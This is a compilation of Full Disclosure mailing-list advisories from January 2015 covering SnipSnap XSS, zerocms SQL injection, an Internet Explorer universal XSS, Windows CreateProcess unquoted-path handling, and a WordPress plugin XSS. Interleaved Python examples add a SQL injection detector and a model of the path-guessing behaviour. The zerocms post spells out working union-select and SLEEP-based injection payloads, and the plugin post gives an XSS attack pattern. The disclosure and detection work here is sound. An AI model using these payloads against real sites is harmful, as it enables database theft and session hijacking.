[FD] CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

2015-01-31 Thread Jing Wang
CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

Exploit Title: SnipSnap /snipsnap-search? query Parameter XSS
Product: SnipSnap
Vulnerable Versions: 0.5.2a, 1.0b1, 1.0b2
Tested Version: 0.5.2a, 1.0b1, 1.0b2
Advisory Publication: Jan 30, 2015
Latest Update: Jan 30, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9559
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]

Advisory Details:

(1) Vendor & Product Description

Vendor:
SnipSnap

Product & Version:
SnipSnap
0.5.2a
1.0b1
1.0b2

Vendor URL & Download:
http://snipsnap.org

Product Description:
SnipSnap is a user-friendly content management system with features such
as wiki and weblog.

(2) Vulnerability Details:
SnipSnap has a security problem. It can be exploited by XSS attacks.

(2.1) The vulnerability occurs at the snipsnap-search? page with the query
parameter.

References:
http://tetraph.com/security/cves/cve-2014-9559-snipsnap-xss-cross-site-scripting-security-vulnerabilities/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9559
https://security-tracker.debian.org/tracker/CVE-2014-9559
http://www.cvedetails.com/cve/CVE-2014-9559/
http://www.security-database.com/detail.php?alert=CVE-2014-9559
http://packetstormsecurity.com/files/cve/CVE-2014-9559
http://www.pentest.it/cve-2014-9559.html
http://www.naked-security.com/cve/CVE-2014-9559/
http://007software.net/cve-2014-9559/

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] SQL injection vulnerabilities in zerocms <= v.1.3.3

2015-01-31 Thread Steffen Rösemann
Advisory: SQL injection vulnerabilities in zerocms <= v.1.3.3
Advisory ID: SROEADV-2015-13
Author: Steffen Rösemann
Affected Software: zerocms <= v.1.3.3 (released 23rd-Jan-2015)
Vendor URL: http://aas9.in/zerocms/
Vendor Status: platform will be moving to Rails4
CVE-ID: -

==
Vulnerability Description:
==

Content management system Zerocms v. 1.3.3 suffers from SQL injection
vulnerabilities.

==
Technical Details:
==

The article_id-parameter used in zero_view_article.php is vulnerable to SQL
injection. It is located here in a common Zerocms-installation and can be
exploited even by unregistered users:

http://{TARGET}/views/zero_view_article.php?article_id=1

Exploit-Example:

http://{TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+

A Blind SQL injection vulnerability can be found in the file
zero_user_transact.php. The parameter user_id is vulnerable to SQL
injection. See the following example POST request, which serves as an
exploit example:

POST /views/zero_transact_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

name=user&email=user%40user.de&access_level=1&user_id=2 AND SLEEP(30)&action=Modify+Account

The Blind SQL injection vulnerability can be exploited on the
administrative backend of Zerocms.

The vulnerabilities described above have been tested on the following
versions of Zerocms:

- v. 1.3.2
- v. 1.3.3

=
Solution:
=

The vendor seems not to provide a patch for these vulnerabilities, as version
1.3.3 is the last release for this PHP-based platform. It will be developed
on the Rails4 platform in future releases (see the GitHub repository, release
section).

Disclosure Timeline:

23-Jan-2015 - found the vulnerabilities in v.1.3.2
23-Jan-2015 - informed the developers (see [3])
23-Jan-2015 - release date of this security advisory [without technical
details]
23-Jan-2015 - forked the vulnerable version to keep it available for other
researchers (see [4])
23-Jan-2015 - developer released v.1.3.3 of zerocms
24-Jan-2015 - vulnerabilities can also be found in v.1.3.3
29-Jan-2015 - as the vendor will move the platform to Rails4, it seems that
there will be no patch provided (see [5])
29-Jan-2015 - release date of this security advisory
29-Jan-2015 - sent to Full Disclosure

Credits:

Vulnerability found and advisory written by Steffen Rösemann.

===
References:
===

[1] http://aas9.in/zerocms/
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html
[3] https://github.com/perezkarjee/zerocms/issues/3
[4] https://github.com/sroesemann/zerocms
[5] https://twitter.com/sroesemann/status/559273548691546113

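A detection check for the two request shapes in the advisory above (the union-based article_id payload and the time-based user_id payload), as an added example that is not part of the advisory or of zerocms. The sample requests are constructed to mirror the PoC, and target.example is a placeholder host.

```python
"""Detection checks for the two zerocms request shapes in the advisory.

Added example, not part of the advisory or of zerocms. The parameter names
(article_id, user_id) and payload forms come from the advisory; the sample
requests below are constructed to mirror its PoC.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Parameters that zerocms uses as integer row ids (per the advisory).
INT_PARAMS = {"article_id", "user_id"}

# Indicators for the union-based and time-based payloads shown above.
SQLI_PATTERNS = [
    ("union select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("time-based function", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("comment sequence", re.compile(r"--\s*$|/\*")),
]

def check_params(params):
    """Return (parameter, reason) pairs for every suspicious value."""
    findings = []
    for name, values in params.items():
        for value in values:
            if name in INT_PARAMS and not re.fullmatch(r"\d+", value):
                findings.append((name, "non-integer id"))
            for reason, pattern in SQLI_PATTERNS:
                if pattern.search(value):
                    findings.append((name, reason))
                    break
    return findings

def check_get(url):
    """Inspect the query string of a GET request URL (decoded by parse_qs)."""
    return check_params(parse_qs(urlsplit(url).query))

def check_post(body):
    """Inspect an application/x-www-form-urlencoded POST body."""
    return check_params(parse_qs(body))

# Constructed samples modelled on the advisory's PoC requests.
BENIGN_URL = "http://target.example/views/zero_view_article.php?article_id=1"
UNION_URL = ("http://target.example/views/zero_view_article.php?article_id="
             "-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+")
BLIND_BODY = ("name=user&email=user%40user.de&access_level=1"
              "&user_id=2 AND SLEEP(30)&action=Modify+Account")

if __name__ == "__main__":
    for label, found in [("benign", check_get(BENIGN_URL)),
                         ("union", check_get(UNION_URL)),
                         ("blind", check_post(BLIND_BODY))]:
        print(f"{label}: {found or 'clean'}")
```

The integer check alone catches both payloads, which is the point: the ids should have been validated as integers (or bound as parameters) before reaching the query.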

[FD] Major Internet Explorer Vulnerability - NOT Patched

2015-01-31 Thread David Leo

Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.

Summary
An Internet Explorer vulnerability is shown here:
Content of dailymail.co.uk can be changed by external domain.

How To Use
1. Close the popup window (confirm dialog) after three seconds.
2. Click Go.
3. After 7 seconds, "Hacked by Deusen" is actively injected into
dailymail.co.uk.

Technical Details
Vulnerability: Universal Cross Site Scripting (XSS)
Impact: Same Origin Policy (SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject anything
into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply nice.

Kind Regards,




[FD] Defense in depth -- the Microsoft way (part 27): the command line you get differs from the command line I use to call you

2015-01-31 Thread Stefan Kanthak
Hi @ll,

on Windows, the command line an application receives can differ
from the command line the calling application supplies to
CreateProcess*().

The documentation of GetCommandLine()
https://msdn.microsoft.com/en-us/library/ms683156.aspx tells:

| Note  The name of the executable in the command line that
| the operating system provides to a process is not necessarily
| identical to that in the command line that the calling process
| gives to the CreateProcess function. The operating system may
| prepend a fully qualified path to an executable name that is
| provided without a fully qualified path.

This is not the whole truth; another Note is missing there:
when CreateProcess*() is called using a command line with an
UNQUOTED long filename/pathname containing spaces (a well-known
VULNERABILITY: https://cwe.mitre.org/data/definitions/428.html)
it uses trial and error to guess the pathname of the executable.

The documentation of CreateProcess()
https://msdn.microsoft.com/en-us/library/ms682425.aspx tells:

| [...] the module name must be the first white space-delimited
| token in the lpCommandLine string. If you are using a long file
| name that contains a space, use quoted strings to indicate where
| the file name ends and the arguments begin; otherwise, the file
| name is ambiguous. For example, consider the string
| c:\program files\sub dir\program name.
| This string can be interpreted in a number of ways. The system
| tries to interpret the possibilities in the following order:
|     c:\program.exe files\sub dir\program name
|     c:\program files\sub.exe dir\program name
|     c:\program files\sub dir\program.exe name
|     c:\program files\sub dir\program name.exe

In the latter 3 cases, however, the command line is modified too:
Windows adds quotes around the part of the command line which
forms the result of this interpretation and yields the path
to the executable, if this part contains a space.

The 4 command lines shown above are transformed into:

c:\program.exe files\sub dir\program name
"c:\program files\sub.exe" dir\program name
"c:\program files\sub dir\program.exe" name
"c:\program files\sub dir\program name.exe"


JFTR: without this transformation, splitting of the command line
  into the argv vector would give wrong results ... in the
  presence of CreateProcess*()'s braindead behaviour!

Stay tuned!

regards
Stefan Kanthak


PS: the documentation of CommandLineToArgvW()
https://msdn.microsoft.com/en-us/library/bb776391.aspx
contains a funny and surprising remark:

| This function accepts command lines that contain a program name;
| the program name can be enclosed in quotation marks or not.

This does NOT mean, however, that CommandLineToArgvW() tries to
guess like CreateProcess()!
It treats c:\program files\sub dir\program name
as c:\program files\sub dir\program name.

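A model of the guessing and re-quoting the post describes, as an added example that is neither Windows code nor part of the post. The paths are the MSDN ones quoted above; `existing` is a constructed stand-in for the file system, and the argv splitter is a simplified CommandLineToArgvW without its backslash rules.

```python
"""Model of the CreateProcess*() module-name guessing described above.

Added example, not part of the post and not Windows code: it follows the
documented order of interpretation for an unquoted lpCommandLine, quotes
the resolved part as the post describes, and splits like a simplified
CommandLineToArgvW (no backslash-escape rules). `existing` is a constructed
set of lower-case paths standing in for the file system.
"""

def candidates(cmdline):
    """Yield (executable, remaining arguments) in the order CreateProcess
    tries them: each space-delimited prefix, with .exe appended."""
    tokens = cmdline.split(" ")
    for i in range(1, len(tokens) + 1):
        yield " ".join(tokens[:i]) + ".exe", " ".join(tokens[i:])

def resolve(cmdline, existing):
    """Return (chosen executable, command line the child receives), or
    None when no candidate exists. A candidate that exists earlier in
    the search order wins, which is the CWE-428 problem the post cites."""
    for exe, rest in candidates(cmdline):
        if exe.lower() in existing:
            # Only a resolved part that contains a space gets quoted.
            head = f'"{exe}"' if " " in exe else exe
            return exe, f"{head} {rest}".rstrip()
    return None

def split_argv(cmdline):
    """Quote-aware split: unlike CreateProcess it never guesses, so an
    unquoted path with spaces falls apart into several arguments."""
    argv, current, quoted = [], "", False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch == " " and not quoted:
            if current:
                argv.append(current)
            current = ""
        else:
            current += ch
    if current:
        argv.append(current)
    return argv

if __name__ == "__main__":
    cmd = r"c:\program files\sub dir\program name"
    target = r"c:\program files\sub dir\program name.exe"
    exe, child_cmd = resolve(cmd, {target})
    print("chosen:", exe)
    print("child sees:", child_cmd, "->", split_argv(child_cmd))
    print("untransformed argv:", split_argv(cmd))
    # A stray c:\program.exe is found first and silently wins.
    print("with c:\\program.exe present:", resolve(cmd, {r"c:\program.exe", target})[0])
```

Quoting the module path in the caller's command line removes the guessing entirely; the model only illustrates what happens when that is not done.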


[FD] Banner Effect Header Security Advisory - XSS Vulnerability - CVE-2015-1384

2015-01-31 Thread Onur Yilmaz
Information

Advisory by Netsparker.
Name: XSS Vulnerability in Banner Effect Header
Affected Software: Banner Effect Header
Affected Versions: 1.2.7 and possibly below
Vendor Homepage: https://wordpress.org/plugins/banner-effect-header/
Vulnerability Type: Cross-site Scripting
Severity: Important
CVE-ID: CVE-2015-1384
Netsparker Advisory Reference: NS-15-002

Description
---
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged-in user's session. This means that the malicious
hacker can change the logged-in user's password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator's session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details
-
Proof of Concept URLs for XSS in Banner Effect Header:

URL: /wp-admin/options-general.php?page=BannerEffectOptions
Parameter Name: banner_effect_divid
Parameter Type: Post
Attack Pattern:  onclick=alert(1) 

For more information on cross-site scripting vulnerabilities read the
following article on Cross-site Scripting (XSS) -
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline

21/01/2015 - First Contact
29/01/2015 - Vulnerability fixed
29/01/2015 - Advisory released

Solution

Download version 1.2.8, which includes a fix for this vulnerability.

Credits & Authors
-
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker finds and reports security flaws and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allow it to be dead accurate in reporting vulnerabilities,
hence it is the first and only False Positive Free web application
security scanner. For more information visit our website on
https://www.netsparker.com
